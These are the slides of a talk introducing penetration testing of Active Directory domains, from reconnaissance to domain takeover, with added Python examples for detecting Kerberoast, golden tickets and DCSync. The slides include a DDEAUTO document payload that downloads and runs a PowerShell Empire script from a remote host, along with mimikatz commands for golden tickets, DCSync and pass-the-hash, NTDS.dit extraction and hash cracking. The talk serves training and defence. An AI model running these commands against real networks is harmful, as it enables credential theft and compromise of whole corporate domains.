Introduction to penetration testing in Microsoft Active Directory environments, delivered as a hands-on talk for auditors and anyone interested in pentesting corporate environments. It opens with a brief introduction to the Active Directory directory service and its most critical components from a security standpoint. It then explains the main differences from a classic infrastructure pentest, together with the most common techniques and attacks used to carry out the exercise and fully compromise the corporate domain. Requirements: attendees are expected to have basic knowledge of Active Directory and basic-to-intermediate knowledge of pentesting or ethical hacking, preferably of infrastructure and/or operating systems.
2. ciyinet
WHOAMI
Carlos García García
- Computer Science Engineer
- Penetration Testing and Red Teaming
- OSCP Certified
- Co-author of the book “Hacking Windows: Ataques a sistemas y redes Microsoft”
2Pentesting Active Directory
WHAT ARE WE GOING TO TALK ABOUT?
- Introduction to Active Directory
- Authentication Protocols
- Active Directory Penetration Testing
- Reconnaissance
- Common Attacks & Techniques
- Lateral and Vertical Movements
- How-to Avoid Being Caught
BEAR IN MIND
- AD-related techniques
- I learn Active Directory from the offensive side
- We lower risks and not the other way around
- This is going to be intense
ACTIVE DIRECTORY 101
• AD is Microsoft’s answer to directory services
• A directory service is a hierarchical structure that stores objects for quick access to and management of all resources
ACTIVE DIRECTORY 101
• Uses LDAP as its access protocol
• Relies on DNS as its locator service, enabling clients to locate domain controllers through DNS queries
• AD supports several Naming Conventions
• User Principal Names (UPN):
• user@domain
• LDAP names (Distinguished Names):
• cn=common name
• ou=organizational unit
• dc=domain
• e.g. cn=ciyi, ou=Madrid, dc=Rooted, dc=CON
NTLM SCHEME

Protocol   Algorithm   Secret used
LM         DES-ECB     LM hash
NTLMv1     DES-ECB     NT hash
NTLMv2     HMAC-MD5    NT hash

KERBEROS SCHEME
1. The client encrypts a timestamp with his/her hash/key
2. The client receives a TGT signed with the domain krbtgt account that proves they are who they say they are
3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain
4. The DC sends a TGS ticket encrypted using the hash of the account that is associated with that service (SPN)

Protocol   Secret used
Kerberos   RC4 = NT hash
           AES128 key
           AES256 key
PHISHING + DDEAUTO = RCE
• Dynamic Data Exchange (DDE): protocol for transferring data
between applications
• Valid for MS Excel, MS Word… and MS Outlook
• Recently used as macro-less Malware
DDEAUTO "C:\Programs\Microsoft\Office365\Outlook\..\..\..\..\windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire-test.ps1');powershell -e $e # " "Beneficios Qurtuba"
LOCAL RECONNAISSANCE
Collect information about the network, processes and OS in order to investigate what kind of machine we succeeded in infecting.

ipconfig /all
    Displays the IP address, subnet mask, and default gateway for all adapters, plus DHCP and DNS settings
whoami /all
    Displays all information in the current access token, including the current user name, security identifiers (SID), privileges, and groups that the current user belongs to
net localgroup
    Displays the name of the server and the names of local groups on the computer
net localgroup "administrators"
    Displays local administrators
netstat -an
    Displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table
tasklist /V
    Displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer
LOCAL RECONNAISSANCE
net start
    Lists started Windows services
sc qc <SERVICE>
    Gets the parameters for an individual service
accesschk.exe -ucqv <SERVICE>
    Determines service access control rules (accesschk.exe is part of the Microsoft Sysinternals suite)
systeminfo > info_output.txt
    Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties such as RAM, disk space, and network cards
schtasks /query /fo LIST /v
    Lists scheduled tasks: whether they are recurring, where the task can be found and its parameters, as well as, crucially, what permissions they are run with
dir, type, findstr
    Browse and search for information in the local file system
NETWORK RECONNAISSANCE
ping ☺
echo %USERDOMAIN%
    Domain name the host is joined to
echo %logonserver% (or: set logonserver)
    Obtains the name of the Domain Controller the host used to authenticate to
net group /domain
    Lists existing groups in the domain
net group <GROUP NAME> /domain
    Lists members of a group, e.g. "domain computers", "domain controllers", "domain admins"
net localgroup administrators /domain
    Gets members of the built-in group "Administrators"
NETWORK RECONNAISSANCE
net user /domain
    Lists all users within the current domain
net user <ACCOUNT NAME> /domain
    Obtains detailed information about a user given their username
net view
    Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain
net use
    Access to shared resources
net accounts /domain
    Obtains the domain password policy
nltest /domain_trusts
    Maps trust relationships
COMMON ATTACKS & TECHNIQUES
• Passwords in SYSVOL & Group Policy Preferences – 10%
• Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5%
• Kerberos TGS Service Ticket Cracking (Kerberoast) – 20%
• SMB Shares Mining – 75%
• Credential Theft Shuffle (“Mimikatz dance”) – 60%
Reference:
https://adsecurity.org/?p=2362
KERBEROAST
[Diagram: the Kerberos exchange from the KERBEROS SCHEME slide (steps 1-4), with an Attacker label]
KERBEROAST
• Offline brute force of the service account password using the service tickets (TGS)
• No risk of detection
• No account lockouts
• Invoke-Kerberoast from PowerView (dev) to collect hashes
• Focus on user accounts: they have shorter passwords
• JohnTheRipper (magnumripper) to crack them
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/magnumripper/JohnTheRipper
SMB SHARES MINING
• Usually very fruitful, but sometimes boring and time consuming
• Enumerating shares in the environment and looking for data with hardcoded creds (scripts, config files), backups, documentation…
PowerView Find-ShareDomain
• Searches for computer shares on the domain. If -CheckShareAccess is passed, then only shares the current user has read access to are returned.
smbmap
• Intended to simplify searching for potentially sensitive data across large networks.
• Enumerates samba share drives across an entire domain. Lists drives, permissions, contents, upload/download functionality, file name auto-download pattern matching, etc.
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/ShawnDEvans/smbmap
CREDENTIAL THEFT SHUFFLE
• Escalating privileges on some machine
• Extracting creds/hashes from memory
• Derivative administrator
• User hunting: moving laterally and repeating the attack till Domain
Admin level is reached
References:
https://github.com/gentilkiwi/mimikatz
“Mimikatz dance”
USER HUNTING
• Invoke-UserHunter (PowerView)
• BloodHound
1. Gets groups and group members of each group
2. Lists domain computers
3. Obtains local admins for each computer
4. Lists active sessions on each computer
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/BloodHoundAD/BloodHound
PASS-THE-TICKET
• Inject Kerberos tickets
• Tickets must be in Kerberos credential format (KRB_CRED) - http://tools.ietf.org/html/rfc4120#section-5.8
• The Kerberos module does not require any privilege. It uses the official Microsoft Kerberos API
mimikatz.exe "kerberos::ptt FILENAME"
GOLDEN TICKET

[Diagram: the attacker, holding krbtgt:hash, forges a TGT (username, group membership, …) encrypted with the KRBTGT hash]
GOLDEN TICKET
KRBTGT hash can be used to generate arbitrary TGT:
• Made by the attacker, not KDC
• Anything can be pushed inside
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /user:USERNAME /id:ID /groups:500,501,513,512,520,518,519 /ptt"
DCSYNC
• It “impersonates” a Domain Controller and requests account password data from the targeted Domain Controller
• Replicates the user credentials via GetNCChanges (Directory Replication Service (DRS) Remote Protocol)
• Special rights are required to run DCSync
mimikatz.exe "lsadump::dcsync /dc:DC /domain:DOMAIN /user:USERNAME" exit
mimikatz.exe "lsadump::dcsync /all /csv" exit
DCSHADOW
Register new domain controllers to inject malicious AD objects and so create backdoors or any kind of illegitimate access or right.
Reference:
https://blog.alsid.eu/dcshadow-explained-4510f52fc19d
NTDS.DIT
How-to get hashes from it:
1. Decrypt the Password Encryption Key (PEK); the PEK is encrypted using the bootkey
2. First round of hash decryption with the PEK using RC4
3. Second round of hash decryption with DES
GRAB NTDS.DIT AND SYSTEM
Volume Shadow Copy, Ntdsutil or Invoke-NinjaCopy:

Invoke-NinjaCopy -Path "C:\Windows\NTDS\ntds.dit" -LocalDestination "C:\ntds.dit"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:\SYSTEM"
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
vssadmin create shadow /for=C:
CRACKING NT HASHES
John the Ripper
Hashcat & Rockyou wordlist

john FILE_HASHES --format=NT
hashcat -a 0 -m 1000 --username FILE_HASHES /usr/share/wordlists/rockyou.txt --potfile-path OUTPUT_NT.pot

PASS-THE-HASH
• Based on local Security events
• Not captured by ATA by default
• Force NTLM to be used
• Overpass-the-hash: the encryption downgrade is detected
mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM" exit
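An added example, not code from the talk, of the Security-event detection this slide and the Kerberoast slide refer to: it walks constructed 4768/4769 records (tab-separated key=value fields; account names and addresses are made up) and flags RC4 (0x17) service tickets requested by one principal across several user service accounts (the Kerberoast pattern) and RC4 TGTs issued to accounts that normally authenticate with AES (the overpass-the-hash downgrade).

```python
from collections import defaultdict

# Encryption type as logged in the TicketEncryptionType field of Windows Security events
RC4_HMAC = "0x17"  # RC4-HMAC: the ticket is encrypted with the NT hash

# Constructed sample events (not real log data). 4769 = service ticket (TGS) requested,
# 4768 = TGT (AS-REQ) requested. ServiceName in 4769 is the service account's name.
SAMPLE_EVENTS = """\
EventID=4769\tTargetUserName=alice@LAB.LOCAL\tServiceName=sqlsvc\tTicketEncryptionType=0x17\tIpAddress=10.0.0.15
EventID=4769\tTargetUserName=alice@LAB.LOCAL\tServiceName=websvc\tTicketEncryptionType=0x17\tIpAddress=10.0.0.15
EventID=4769\tTargetUserName=alice@LAB.LOCAL\tServiceName=WS01$\tTicketEncryptionType=0x17\tIpAddress=10.0.0.15
EventID=4769\tTargetUserName=bob@LAB.LOCAL\tServiceName=websvc\tTicketEncryptionType=0x12\tIpAddress=10.0.0.22
EventID=4768\tTargetUserName=bob\tServiceName=krbtgt\tTicketEncryptionType=0x17\tIpAddress=10.0.0.99
EventID=4768\tTargetUserName=carol\tServiceName=krbtgt\tTicketEncryptionType=0x12\tIpAddress=10.0.0.23
"""

def parse_events(text):
    """Split each line into a dict of field=value pairs."""
    return [dict(f.split("=", 1) for f in line.split("\t"))
            for line in text.splitlines() if line.strip()]

def kerberoast_candidates(events, min_accounts=2):
    """4769 events where one requester obtained RC4 service tickets for several user
    service accounts. Machine accounts ($) and krbtgt are skipped: their keys are long
    and random, so offline cracking of those tickets is not the concern here."""
    requested = defaultdict(set)
    for e in events:
        if e.get("EventID") != "4769" or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        requested[e["TargetUserName"]].add(svc)
    return {user: sorted(s) for user, s in requested.items() if len(s) >= min_accounts}

def etype_downgrades(events, aes_accounts):
    """4768 events where an account that normally authenticates with AES obtained a
    TGT with RC4: the downgrade an NT-hash-based overpass-the-hash leaves behind."""
    aes = {a.lower() for a in aes_accounts}
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e.get("EventID") == "4768" and e.get("TicketEncryptionType") == RC4_HMAC
            and e["TargetUserName"].lower() in aes]

if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("kerberoast candidates:", kerberoast_candidates(evs))
    print("etype downgrades:", etype_downgrades(evs, {"bob", "carol"}))
```

The AES account list would come from the accounts' msDS-SupportedEncryptionTypes values or from a baseline of their usual 4768 encryption types.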
GOLDEN TICKET
• Same as overpass-the-hash
• Detection based on lifetime
• Default ticket lifetime in AD is 10 hours
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt"
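The lifetime-based detection above, as an added example that is not part of the talk: each TGT's lifetime and renewable lifetime is compared with the domain policy, using the 10-hour and 7-day (10080-minute) defaults that /endin:600 and /renewmax:10080 mirror. The ticket records are constructed in klist style; the third one shows that a forged ticket whose lifetime copies the policy is invisible to this check.

```python
from datetime import datetime, timedelta

# Default Domain Policy Kerberos limits (adjust to the audited domain's policy)
MAX_TICKET_AGE = timedelta(hours=10)  # the value /endin:600 (minutes) mirrors
MAX_RENEW_AGE = timedelta(days=7)     # the value /renewmax:10080 (minutes) mirrors
FMT = "%Y-%m-%d %H:%M:%S"

# Constructed klist-style TGT records (start, end, renew-until), not real output
SAMPLE_TICKETS = [
    # legitimate TGT issued by the KDC under default policy
    {"client": "alice@LAB.LOCAL", "start": "2024-03-01 08:00:00",
     "end": "2024-03-01 18:00:00", "renew": "2024-03-08 08:00:00"},
    # forged ticket with mimikatz's default 10-year lifetime (no /endin given)
    {"client": "admin@LAB.LOCAL", "start": "2024-03-01 08:00:00",
     "end": "2034-02-27 08:00:00", "renew": "2034-02-27 08:00:00"},
    # forged ticket that copies the policy values: not caught by this check
    {"client": "admin@LAB.LOCAL", "start": "2024-03-01 09:00:00",
     "end": "2024-03-01 19:00:00", "renew": "2024-03-08 09:00:00"},
]

def ticket_lifetime(t):
    """Return (lifetime, renewable lifetime) of a ticket record as timedeltas."""
    start, end, renew = (datetime.strptime(t[k], FMT) for k in ("start", "end", "renew"))
    return end - start, renew - start

def ticket_violations(tickets, max_age=MAX_TICKET_AGE, max_renew=MAX_RENEW_AGE):
    """Tickets whose lifetime or renewable lifetime exceeds what the KDC would issue."""
    out = []
    for t in tickets:
        life, renewable = ticket_lifetime(t)
        reasons = []
        if life > max_age:
            reasons.append(f"lifetime {life} exceeds policy {max_age}")
        if renewable > max_renew:
            reasons.append(f"renewable lifetime {renewable} exceeds policy {max_renew}")
        if reasons:
            out.append((t["client"], t["start"], reasons))
    return out

if __name__ == "__main__":
    for client, start, reasons in ticket_violations(SAMPLE_TICKETS):
        print(client, start, "; ".join(reasons))
```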
DCSYNC
DRS traffic (DSGetNCChanges) from a non-DC to a DC system can be detected
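The same detection expressed over the DC's own Security log rather than network traffic, as an added example that is not from the talk: a Security event 4662 in which a replication extended right (the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All GUIDs) is exercised by an account that is neither a domain controller computer account nor an allowlisted sync account is flagged. The records are constructed; the DC account list is what net group "domain controllers" /domain from the reconnaissance slides returns.

```python
import re

# Extended-right GUIDs that directory replication (what DCSync asks for) requires
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed Security event 4662 records (not real log lines). Properties lists the
# access GUIDs; AccessMask 0x100 is "Control Access" (an extended right was exercised).
SAMPLE_4662 = [
    {"EventID": "4662", "SubjectUserName": "DC02$", "ObjectName": "DC=lab,DC=local",
     "AccessMask": "0x100", "Properties": "Control Access "
     "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": "4662", "SubjectUserName": "jdoe", "ObjectName": "DC=lab,DC=local",
     "AccessMask": "0x100", "Properties": "Control Access "
     "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # User-Force-Change-Password right on one user: an extended right, but not replication
    {"EventID": "4662", "SubjectUserName": "helpdesk",
     "ObjectName": "CN=alice,CN=Users,DC=lab,DC=local", "AccessMask": "0x100",
     "Properties": "Control Access {00299570-246d-11d0-a768-00aa006e0529}"},
]

def dcsync_alerts(events, dc_accounts, allowlist=()):
    """Flag 4662 events in which an account that is neither a DC computer account
    nor an approved sync account (e.g. a directory sync service) exercised a
    replication extended right on a naming context."""
    trusted = {a.lower() for a in dc_accounts} | {a.lower() for a in allowlist}
    alerts = []
    for e in events:
        if e.get("EventID") != "4662" or e.get("AccessMask") != "0x100":
            continue
        used = {g.lower() for g in GUID_RE.findall(e.get("Properties", ""))} & REPLICATION_GUIDS
        if used and e["SubjectUserName"].lower() not in trusted:
            alerts.append((e["SubjectUserName"], e["ObjectName"], sorted(used)))
    return alerts

if __name__ == "__main__":
    # DC computer accounts: output of  net group "domain controllers" /domain
    print(dcsync_alerts(SAMPLE_4662, dc_accounts=["DC01$", "DC02$"]))
```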
BUSINESS RISK
Compromise of just one Domain Admin account in the Active Directory exposes the entire organization to risk. The attacker would have unrestricted access to all resources managed by the domain: all users, servers, workstations and data.

Moreover, the attacker could instantly establish persistence in the Active Directory environment, which is difficult to notice and cannot be efficiently remediated with guarantees.
“Once domain admin, always domain admin”
ACKNOWLEDGMENT & REFERENCES
• Miroslav Sotak and TVM team
• FWHIBBIT
• RootedCON and any other Sec Community in Spain